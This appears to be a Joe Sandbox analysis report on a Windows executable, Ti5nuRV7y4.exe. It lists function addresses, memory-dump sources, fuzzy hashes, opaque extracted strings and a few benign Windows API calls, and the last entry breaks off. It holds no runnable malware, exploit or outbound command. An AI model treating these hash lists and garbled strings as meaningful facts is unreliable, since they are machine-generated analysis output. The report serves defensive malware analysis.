Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a60671c1af97214c99437040f15f107499289fd1c5b5d463e6ca0e53010fcf
Instruction ID: ca49c23dcd8d5d40a171f162352e704ac8e5e788cd95727c8776bcdfedb812cd
Opcode Fuzzy Hash: c4a60671c1af97214c99437040f15f107499289fd1c5b5d463e6ca0e53010fcf
Instruction Fuzzy Hash: 1D515EB1E042198FDB14CFA9C5805AEFBF2FF89304F24816AD519AB315D731A942CFA1

Function 076FC372 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29819251c6d5178046921709c546a69b92ff6766cefc255b15b9ef4d036dacec
Instruction ID: b7e0885269142f77fe95ad8ded12937c27ad8d1510652709273cdff2cf743e4d
Opcode Fuzzy Hash: 29819251c6d5178046921709c546a69b92ff6766cefc255b15b9ef4d036dacec
Instruction Fuzzy Hash: B1E0C9B895A10CCFCB10CF94E8452F8B778AB4B311F006096D60FA2621E730598ACE61

Function 076FC2D4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318668118.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76f0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c8ec9541a183392714b5719f284646bfccad8e97a9fc080acbdeed28c4a455
Instruction ID: 8a0c4ef52c53d6d25bbddc44773b7671097dfa289463f23ee169ef0f1e2eac71
Opcode Fuzzy Hash: 29c8ec9541a183392714b5719f284646bfccad8e97a9fc080acbdeed28c4a455
Instruction Fuzzy Hash: 52E092B895A108CBCB108F94E8455F8B7B8AB4B311F0070A6DA0EA7621E730595ACA65

Analysis Process: Ti5nuRV7y4.exePID: 7308, Parent PID: 792COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	189
Total number of Limit Nodes:	12

Executed Functions

Function 0174C147 Relevance: 6.5, Strings: 5, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 0174C3EF
LjKp, xrefs: 0174C377
LjKp, xrefs: 0174C38D
PHq, xrefs: 0174C400
0oKp, xrefs: 0174C20A

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: a0b58bf51ffb39a8493dba542b34ad9cb752429f68c211dab932ac64cf90127a
Instruction ID: c4dc2adec494db1151c3da3d5e19930bdb9b285ad6c03e9f115a6f67c2d04e30
Opcode Fuzzy Hash: a0b58bf51ffb39a8493dba542b34ad9cb752429f68c211dab932ac64cf90127a
Instruction Fuzzy Hash: E0A1E674E01218CFEB15CFAAD984A9DFBF2BF89300F14806AE409AB365DB349941CF51

Function 01745362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 017455D9
PHq, xrefs: 017455C8
0oKp, xrefs: 017453E2
LjKp, xrefs: 01745566
LjKp, xrefs: 01745550

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: 85d234d723f1f21cdf1d22b53803fd988b86b5e61afc838688d32a79874630ab
Instruction ID: 8dc5e2b367f7cfaa961952ee0a17ed858832492ccfc267d1bacd7580c80344fb
Opcode Fuzzy Hash: 85d234d723f1f21cdf1d22b53803fd988b86b5e61afc838688d32a79874630ab
Instruction Fuzzy Hash: C191C674E00218CFDB15CFAAD984A9DFBF2BF89300F1480A9D819AB365DB349945CF51

Function 0174C468 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174C65D
LjKp, xrefs: 0174C647
0oKp, xrefs: 0174C4DA
PHq, xrefs: 0174C6BF
PHq, xrefs: 0174C6D0

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: 825cc526e1d546a124117549716f3f01577dd5f630cedd0a48764c50a9c59015
Instruction ID: 5b37ad8fe3a8f680aa20935aad3ae86ea6234a8e1c49f5955e6f97f35a4be818
Opcode Fuzzy Hash: 825cc526e1d546a124117549716f3f01577dd5f630cedd0a48764c50a9c59015
Instruction Fuzzy Hash: F981A274E012188FEB15DFAAD944A9DFBF2BF89300F24C06AE819AB265DB345941CF51

Function 0174D278 Relevance: 6.4, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174D46D
PHq, xrefs: 0174D4CF
0oKp, xrefs: 0174D2EA
PHq, xrefs: 0174D4E0
LjKp, xrefs: 0174D457

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: c4ec80fcec423075e924d89d9a937f8d25d17656047a9159200a80a32f5b4eba
Instruction ID: d2e5bec4dcf36580281a48434d2d51feb9a10b99f094b7d7eb7cb339401b3248
Opcode Fuzzy Hash: c4ec80fcec423075e924d89d9a937f8d25d17656047a9159200a80a32f5b4eba
Instruction Fuzzy Hash: 4F81A374E00218CFDB24DFAAD984A9DFBF2BF99300F148069E859AB365DB745941CF11

Function 0174CA08 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174CBFD
0oKp, xrefs: 0174CA7A
PHq, xrefs: 0174CC5F
PHq, xrefs: 0174CC70
LjKp, xrefs: 0174CBE7

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: 52c954713d5d1c59aa19c05fd5a2c49f5299f209c12e2699753c2f31e9dd02c9
Instruction ID: 58804a8236b3e720556b6afd498d93dde001847b529571e3eb06e89ce46f6b48
Opcode Fuzzy Hash: 52c954713d5d1c59aa19c05fd5a2c49f5299f209c12e2699753c2f31e9dd02c9
Instruction Fuzzy Hash: A3819174E01218CFEB15DFAAD984A9DFBF2BF89300F14C06AE819AB265DB345941CF51

Function 0174CCD8 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174CECD
0oKp, xrefs: 0174CD4A
PHq, xrefs: 0174CF2F
PHq, xrefs: 0174CF40
LjKp, xrefs: 0174CEB7

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: 2b290fa2f39caa47d663703a3345c65880d889688a59ebfc5cd6e59149e8010b
Instruction ID: ab01321cf9e974679e1b8778679ec9deec23d096309213e65bedaf196bf24bed
Opcode Fuzzy Hash: 2b290fa2f39caa47d663703a3345c65880d889688a59ebfc5cd6e59149e8010b
Instruction Fuzzy Hash: B981B274E01218DFEB15CFAAD984A9DFBF2BF89300F14C069E419AB265DB345981CF51

Function 0174C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174C917
LjKp, xrefs: 0174C92D
PHq, xrefs: 0174C98F
0oKp, xrefs: 0174C7AA
PHq, xrefs: 0174C9A0

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: df6af7718ab67610f7df8a3260801b479abf691db71bdddfdbeb2b30149c0d50
Instruction ID: dfb3a989de4635086afbacf3d2580c55ea1c21ee24333efe361d70b53e092fc9
Opcode Fuzzy Hash: df6af7718ab67610f7df8a3260801b479abf691db71bdddfdbeb2b30149c0d50
Instruction Fuzzy Hash: 8381B274E01218DFEB15DFAAD944A9DFBF2BF88300F14806AE419AB365DB345941CF50

Function 0174CFAB Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjKp, xrefs: 0174D19D
PHq, xrefs: 0174D210
PHq, xrefs: 0174D1FF
0oKp, xrefs: 0174D01A
LjKp, xrefs: 0174D187

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 0oKp$LjKp$LjKp$PHq$PHq
API String ID: 0-2065946399
Opcode ID: 5a16347275c09d1fbef69608f338e3c59ab752f2de0c6382d87aeb20b6dda104
Instruction ID: 6ccbd9f111331ddf8c410a9436ac9e863405b0cbe6782348715022591848fbe1
Opcode Fuzzy Hash: 5a16347275c09d1fbef69608f338e3c59ab752f2de0c6382d87aeb20b6dda104
Instruction Fuzzy Hash: 3C819274E00218CFEB24DFAAD984A9DFBF2BF88310F158069E859AB365DB345941CF51

Function 01749DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

4'q, xrefs: 01749F0C
4'q, xrefs: 0174AB13
4'q, xrefs: 01749E04
(oq, xrefs: 0174A518

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: cc725cc1a37fd1f82c77cecaa9daebf920de464d5acb58a033d5cf3e6590180d
Instruction ID: 4cdec7ee78768681d5f3366678dcbdc3ac836f92f01ef79f80acc4d34b5e057f
Opcode Fuzzy Hash: cc725cc1a37fd1f82c77cecaa9daebf920de464d5acb58a033d5cf3e6590180d
Instruction Fuzzy Hash: F3A28F35A40209CFCB16CFA8C984AAEFBF6FF89310F158569E506DB266D730E941CB51

Function 01746FC8 Relevance: 5.5, Strings: 4, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 01747220
(oq, xrefs: 01747212
,q, xrefs: 01747298
,q, xrefs: 0174728A

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: 960a23c6961da04fecc5223d19e0e723b621becc68de5ae9e3368ac5077dd74a
Instruction ID: 1ad1d40fcecda7618154e9e93897d4740cd1c96b9056805df49459075a2a46f9
Opcode Fuzzy Hash: 960a23c6961da04fecc5223d19e0e723b621becc68de5ae9e3368ac5077dd74a
Instruction Fuzzy Hash: 6B125E30A00259CFDB19CF69C984AADFBF6FF89350F2584A9E915AB261D730DD41CB90

Function 017469A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hq, xrefs: 01746DA6
(oq, xrefs: 01746EDA

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 48b295fb7cc6f2e46871f8d3757954a7b48dad7c82a17b7a74f15bc90009d98e
Instruction ID: 049af08d1a8eadd4e01a67abbd8e98ce9306e59b85c809b26fb93c03de7b426e
Opcode Fuzzy Hash: 48b295fb7cc6f2e46871f8d3757954a7b48dad7c82a17b7a74f15bc90009d98e
Instruction Fuzzy Hash: AC129D70A002198FDB19DF69C854BAEBBF6FF89300F148569E906DB395DB309D81CB90

Function 01743E09 Relevance: 2.9, Strings: 2, Instructions: 439COMMON

Download Yara Rule

Strings

Xq, xrefs: 01743E47
$q, xrefs: 01743E2E

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 3bf1898f44b66d6eb405ffeea28b33855d07fe7838a1d7fb235e6a054bb9a07e
Instruction ID: c46d078785bee17133d2925509b04d3223729607e8a83234d480deeef218d51d
Opcode Fuzzy Hash: 3bf1898f44b66d6eb405ffeea28b33855d07fe7838a1d7fb235e6a054bb9a07e
Instruction Fuzzy Hash: 3FF15D34F04219DFDB28DFB9D4546AEBBB2FF89300B148569E506EB369CB359802CB51

Function 06CC9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3711514403.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6cc0000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 206bdb60dd0cf8e7d0af2ddb80afe3560f29207a7372bfca1f790fe3a47fe9f8
Instruction ID: 106f8fe159306c20ae8990d2910051dac30461b03e8737818b6939cc047ce011
Opcode Fuzzy Hash: 206bdb60dd0cf8e7d0af2ddb80afe3560f29207a7372bfca1f790fe3a47fe9f8
Instruction Fuzzy Hash: E1F1F374E01218CFDB64DFA9C884B9DFBB2BF88314F1481A9E808AB355DB749985CF50

Function 0174E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b21d40f27d3078c0c80b8c4de2e3c464ac762951eeccf65e01c2dc6a1c2dd9b
Instruction ID: 06614d28702857b2720d8d34128cd876239ae0c76a20cc5300fc4c979dec5c0a
Opcode Fuzzy Hash: 8b21d40f27d3078c0c80b8c4de2e3c464ac762951eeccf65e01c2dc6a1c2dd9b
Instruction Fuzzy Hash: 35519274E00208DFEB18DFAAD594A9DFBB2FF89310F248029E819AB364DB345941CF55

Function 0174E97B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c14c9e3388f5cc3978888961b387dc9cd0703b5f3d62992d2694ccc0701a50
Instruction ID: ecfbe41c7be90ede4e1e0bedcda73ba22ee278fcab674392e5f77264d0a504ed
Opcode Fuzzy Hash: 12c14c9e3388f5cc3978888961b387dc9cd0703b5f3d62992d2694ccc0701a50
Instruction Fuzzy Hash: 92519674E00208DFEB18DFAAD594AADFBB2FF89310F248129E815AB365DB345941CF14

Function 017476F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 01747BA0
(oq, xrefs: 01747815
(oq, xrefs: 017478B2
,q, xrefs: 01747B90
(oq, xrefs: 01747C0F
(oq, xrefs: 01747BFF
(oq, xrefs: 0174772E
(oq, xrefs: 017477E9

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 657d27291b5a12d7ea76e8def37951872b1d298f2fb6198c8036126a015a180f
Instruction ID: ce7329539a79d7586fe23e2e6654d259c88cb4c18e1a7ca0b31799a52f80b0aa
Opcode Fuzzy Hash: 657d27291b5a12d7ea76e8def37951872b1d298f2fb6198c8036126a015a180f
Instruction Fuzzy Hash: 3D125734A002498FDB29CF68D884AAEFBF6FF49314F148599E5099B262D730ED41CB90

Function 01197924 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42

Strings

8@u, xrefs: 0119795E
8@u, xrefs: 0119797E

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: CreateWindow
String ID: 8@u$8@u
API String ID: 716092398-3297297182
Opcode ID: 84e839ade121a634f3db8b1c64712ac002ec88bf5c35f0a9ffc7b060051ad285
Instruction ID: 71f98b205431cc7cb75eebd5421ff0c487b3507de25bb0fa29a45e92896fbfe9
Opcode Fuzzy Hash: 84e839ade121a634f3db8b1c64712ac002ec88bf5c35f0a9ffc7b060051ad285
Instruction Fuzzy Hash: 4551BFB1D103499FDF18CFAAC880ADEBBB5FF48310F64812AE818AB250D7759945CF95

Function 01194DCC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42

Strings

8@u, xrefs: 0119795E
8@u, xrefs: 0119797E

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: CreateWindow
String ID: 8@u$8@u
API String ID: 716092398-3297297182
Opcode ID: 560775980b835cb2046566127e023c39bf552796c69abcb2404247612b825fa3
Instruction ID: 6abd0a57a95d62dc156f89fcae7ce1f09a6cbde07a1c785cc6efa47d57e1ded6
Opcode Fuzzy Hash: 560775980b835cb2046566127e023c39bf552796c69abcb2404247612b825fa3
Instruction Fuzzy Hash: 1D51CDB1D103099FDF18CF9AC884ADEBBB5FF48310F64812AE819AB250D775A941CF95

Function 01195750 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

8@u, xrefs: 0119595F

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: HandleModule
String ID: 8@u
API String ID: 4139908857-2884537684
Opcode ID: d9d16e017e37f42a94784213aa2937bdf419fca47599046e2608829295a1083a
Instruction ID: b0e184d206885a0accb8552f4304502474362fec0648e4046ec0277a5cfffccb
Opcode Fuzzy Hash: d9d16e017e37f42a94784213aa2937bdf419fca47599046e2608829295a1083a
Instruction Fuzzy Hash: C6815A70A00B458FEB69DF2AD44475ABBF2FF48304F00892ED59ADBA40D735E846CB91

Function 01194F1C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0119A131

Strings

8@u, xrefs: 0119A087

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: CallProcWindow
String ID: 8@u
API String ID: 2714655100-2884537684
Opcode ID: 0cf5aa0154040209852d1e594aad2b974c9258cfa93480e1bdc456530d6ef8dc
Instruction ID: 064ebd2648ab43853489d79ec48d67ba66f30bf559119230f898123ae2f7e1ea
Opcode Fuzzy Hash: 0cf5aa0154040209852d1e594aad2b974c9258cfa93480e1bdc456530d6ef8dc
Instruction Fuzzy Hash: 3F4129B5900305CFDB18CF99C848AAABBF5FF88314F25C459D529AB361D734A845CFA1

Function 0119C651 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

8@u, xrefs: 0119C677

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: 8@u
API String ID: 0-2884537684
Opcode ID: b78d2fad63bbb006066446e671435bab9d21aea84b9a462c14dd67d21d07121f
Instruction ID: ac975b606f909c5339fbf5eb823814854ec0a4051617289afe1f87f6f75a161c
Opcode Fuzzy Hash: b78d2fad63bbb006066446e671435bab9d21aea84b9a462c14dd67d21d07121f
Instruction Fuzzy Hash: 6F31A9B6C007488FDB15DFAAD4047DAFBF4EF8A220F24815AC4A9AB351C334A505CFA1

Function 01194C14 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0119576C), ref: 011959A6

Strings

8@u, xrefs: 0119595F

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: HandleModule
String ID: 8@u
API String ID: 4139908857-2884537684
Opcode ID: 7b8152cbb0c0835bbfc35794964854cc8d2a4d6b6d49382302227af936079c35
Instruction ID: f0449678e545495387879eaa5144ad4f61440ac7baa4bcacde3f7d251ed5f790
Opcode Fuzzy Hash: 7b8152cbb0c0835bbfc35794964854cc8d2a4d6b6d49382302227af936079c35
Instruction Fuzzy Hash: 5A11F3B5C00649CFEB18CF9AC444B9EFBF5EB89220F10841AD569B7240D375A545CFA5

Function 0119C5B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0119C60D

Strings

8@u, xrefs: 0119C5D2

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: Initialize
String ID: 8@u
API String ID: 2538663250-2884537684
Opcode ID: 5cdd1247afa163a882835a134562f64119c16680d5e627a8eea63719f0be35a3
Instruction ID: 3bc92f2fbdcb6f8520ce26b630086e8be31a9421d3c5febc2fcec9795aa27b90
Opcode Fuzzy Hash: 5cdd1247afa163a882835a134562f64119c16680d5e627a8eea63719f0be35a3
Instruction Fuzzy Hash: A91145B5800348CFDB24CFAAD444BDEBFF4EB48220F20855AD558A7340C339A644CFA5

Function 0119B720 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0119C60D

Strings

8@u, xrefs: 0119C5D2

Memory Dump Source

Source File: 0000000E.00000002.3696742503.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1190000_Ti5nuRV7y4.jbxd

Similarity

API ID: Initialize
String ID: 8@u
API String ID: 2538663250-2884537684
Opcode ID: 2818269f70818da26f339197b6a9ef33ad01488045d39c72ba2a2ac7494eeaa7
Instruction ID: 05be5becedace5bae313a2e2b0fc3b95839eed68b685b707e40bd79dc2542443
Opcode Fuzzy Hash: 2818269f70818da26f339197b6a9ef33ad01488045d39c72ba2a2ac7494eeaa7
Instruction Fuzzy Hash: C71115B5900348CFDB24DF9AD445BDEBBF4EB48220F208459E559B7340C379AA44CFA5

Function 01745F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hq, xrefs: 01746023
Hq, xrefs: 01746056

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: a600824de62d4bf56725826981bf5938d27862abb5110e20b107ace5de39fbe6
Instruction ID: a9d4482d1907e5e541e1185fba6324243cb7257e6169b591ece1b6590b96461f
Opcode Fuzzy Hash: a600824de62d4bf56725826981bf5938d27862abb5110e20b107ace5de39fbe6
Instruction Fuzzy Hash: 91919030704215CFEB169F68D854B6EBBF2BFC9344F188469E9068B396DB358C42C791

Function 01746498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,q, xrefs: 01746578
,q, xrefs: 0174656E

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 683fdc8fd8a4d731da3afd826acf84a386e716f685706254eafade53d180281c
Instruction ID: 50326f5eea0c82cf4acaf480e8acdbec680cdec07a284a3a89e7e351164f6bc5
Opcode Fuzzy Hash: 683fdc8fd8a4d731da3afd826acf84a386e716f685706254eafade53d180281c
Instruction Fuzzy Hash: 42817074A00505CFDB15DF6DC484969FBB2FF8A710B2481AAE506DB365DB31E841CB92

Function 01743CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 01743CF6
Xq, xrefs: 01743CCD

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: c129b8cffb09f7de84190d169406c4506a051a3e22404e7cc732665c8b162752
Instruction ID: f1228cad02bd30313b2041e8d159c4ee1cbacd709d70009c3b550664f5d0622e
Opcode Fuzzy Hash: c129b8cffb09f7de84190d169406c4506a051a3e22404e7cc732665c8b162752
Instruction Fuzzy Hash: 5331D535B003348BEF29466E889527EE5AAFBC4250F184039D95FC7381DBB5CC858B91

Function 01748EF8 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

$q, xrefs: 01748FD7
$q, xrefs: 01748FB4

Memory Dump Source

Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
